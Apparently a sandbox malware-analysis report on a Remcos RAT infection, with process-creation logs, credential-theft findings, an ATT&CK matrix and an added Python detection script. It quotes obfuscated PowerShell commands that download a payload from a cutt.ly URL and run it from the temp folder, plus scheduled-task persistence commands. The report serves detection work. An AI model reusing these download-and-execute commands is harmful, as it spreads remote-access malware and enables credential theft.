@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Process created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Process created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Process created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Process created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp'
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_004124A0 cpuid
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\sm.exe VolumeInformation
                Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Queries volume information: C:\Users\user\AppData\Roaming\Remcos\remcos.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Queries volume information: C:\Users\user\AppData\Roaming\Remcos\remcos.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Queries volume information: C:\Users\user\AppData\Roaming\Remcos\remcos.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_0041203B GetLocalTime,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
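The three cmd.exe -> powershell.exe command lines and the schtasks.exe invocations listed above are the parts of this chain a detection engineer would key on: a hidden window (-w 1), cmdlet names reassembled from string fragments with backtick escapes, a download followed by a fixed sleep, execution policy bypass, execution of the payload from %TEMP%, and a scheduled task whose definition is an XML file in the user's temp directory. The following Python script is an added example, not Joe Sandbox code and not code from the sample: it normalizes the obfuscation in the quoted command lines and scores them, and checks the quoted schtasks events. The indicator names, the scoring and the third (benign, vendor-installer) schtasks event are constructed for the example and do not appear in the report.

```python
"""Triage of the PowerShell / schtasks chain quoted in this report.

Added example: not Joe Sandbox code and not code from the sample. The
command lines are copied from the report; the indicator names, the
scoring and the benign control event are constructed for the example."""
import re

# Copied from the report's "Process created" entries (cmd.exe -> powershell.exe).
POWERSHELL_CMDLINES = [
    "powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile')"
    ".Invoke('https://cutt.ly/mjfU5y0','sm.exe')",
    "powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe'"
    " -Destination '${enV`:temp}'",
    "powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};"
    ".('.'+'/sm.exe')",
]

# (parent image, schtasks command line): the first two are from the report,
# the third is a constructed benign control (vendor installer, not in the report).
SCHTASKS_EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\sm.exe",
     r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' "
     r"/XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'"),
    (r"C:\Users\user\AppData\Roaming\Remcos\remcos.exe",
     r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' "
     r"/XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'"),
    (r"C:\Program Files\Vendor\setup.exe",
     r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Vendor\Update' "
     r"/XML 'C:\Program Files\Vendor\update.xml'"),
]

# Regexes matched case-insensitively against the normalized command line.
INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+(?:1|hidden)\b",
    "execution_policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass\b",
    "web_download": r"webclient\)?\.downloadfile|invoke-webrequest|downloadstring",
    "sleep_before_next_stage": r"start-sleep\s+\d+",
    "run_from_temp": r"\$\{?env:temp\}?\s*;\s*\./",   # cd %TEMP%; ./payload
}

_CONCAT = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")


def normalize_powershell(cmdline: str) -> str:
    """Undo the cheap obfuscation used in the chain: backtick escapes inside
    tokens, ('a'+'b') string concatenation, and the call operator (.) that is
    only there to execute the reassembled string. Case is preserved."""
    s = cmdline.replace("`", "")
    prev = None
    while prev != s:                      # repeat for nested concatenations
        prev = s
        s = _CONCAT.sub(lambda m: "".join(re.findall(r"'([^']*)'", m.group(0))), s)
    s = re.sub(r"(^|[\s;(])\.(?=\S)", r"\1", s)
    return re.sub(r"\s+", " ", s).strip()


def score_powershell(cmdline: str) -> dict:
    """Return the normalized form plus the names of the indicators that fire."""
    norm = normalize_powershell(cmdline)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, norm, re.I)]
    if "`" in cmdline or re.search(r"'\s*\+\s*'", cmdline):
        hits.append("obfuscated_syntax")  # the raw line needed deobfuscation at all
    return {"normalized": norm, "hits": hits, "score": len(hits)}


def scheduled_task_from_temp(parent_image: str, cmdline: str) -> bool:
    """Flag schtasks /Create whose task definition (/XML) is read from a temp
    directory or whose parent binary runs from a user-writable AppData path,
    which is the shape of the schtasks events in this report."""
    c = cmdline.lower()
    if "schtasks" not in c or "/create" not in c:
        return False
    m = re.search(r"/xml\s+(?:'([^']*)'|(\S+))", c)
    xml_path = (m.group(1) or m.group(2)) if m else ""
    return "\\temp\\" in xml_path or "\\appdata\\" in parent_image.lower()


def triage() -> dict:
    return {
        "powershell": [score_powershell(c) for c in POWERSHELL_CMDLINES],
        "schtasks": [scheduled_task_from_temp(p, c) for p, c in SCHTASKS_EVENTS],
    }


if __name__ == "__main__":
    result = triage()
    for r in result["powershell"]:
        print(f"score={r['score']} hits={r['hits']}\n  {r['normalized']}")
    print("schtasks from temp:", result["schtasks"])
```

The normalization deliberately keeps case and quoting intact so the output is still a readable command line (for example the third stage becomes `powershell -w 1 -EP bypass Start-Sleep 25; cd ${enV:temp};./sm.exe`), and the indicators are matched on that normalized form rather than on the raw text, which is what defeats the fragment-and-backtick trick used here.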

                Stealing of Sensitive Information:

                Yara detected Remcos RAT
                Source: Yara match | File source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: sm.exe PID: 2112, type: MEMORY
                Source: Yara match | File source: Process Memory Space: remcos.exe PID: 884, type: MEMORY
                Source: Yara match | File source: Process Memory Space: remcos.exe PID: 2312, type: MEMORY
                Source: Yara match | File source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: \key3.db
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: \key3.db
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: \key3.db

                Remote Access Functionality:

                Detected Remcos RAT
                Source: sm.exe | String found in binary or memory: Remcos_Mutex_Inj
                Source: remcos.exe | String found in binary or memory: Remcos_Mutex_Inj
                Source: remcos.exe | String found in binary or memory: Remcos_Mutex_Inj
                Yara detected Remcos RAT
                Source: Yara match | File source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: sm.exe PID: 2112, type: MEMORY
                Source: Yara match | File source: Process Memory Space: remcos.exe PID: 884, type: MEMORY
                Source: Yara match | File source: Process Memory Space: remcos.exe PID: 2312, type: MEMORY
                Source: Yara match | File source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: cmd.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: cmd.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: cmd.exe

                Mitre Att&ck Matrix

                Columns are the ATT&CK tactics; cells are separated with " | ". Digits following a technique name are the hit counters shown in the matrix; techniques without a counter are matrix placeholders with no matching signature.

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Scripting 421 | Application Shimming 1 | Application Shimming 1 | Disable or Modify Tools 11 | OS Credential Dumping 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
                Default Accounts | Native API 1 | Windows Service 1 | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 11 | Input Capture 211 | Account Discovery 1 | Remote Desktop Protocol | Input Capture 211 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
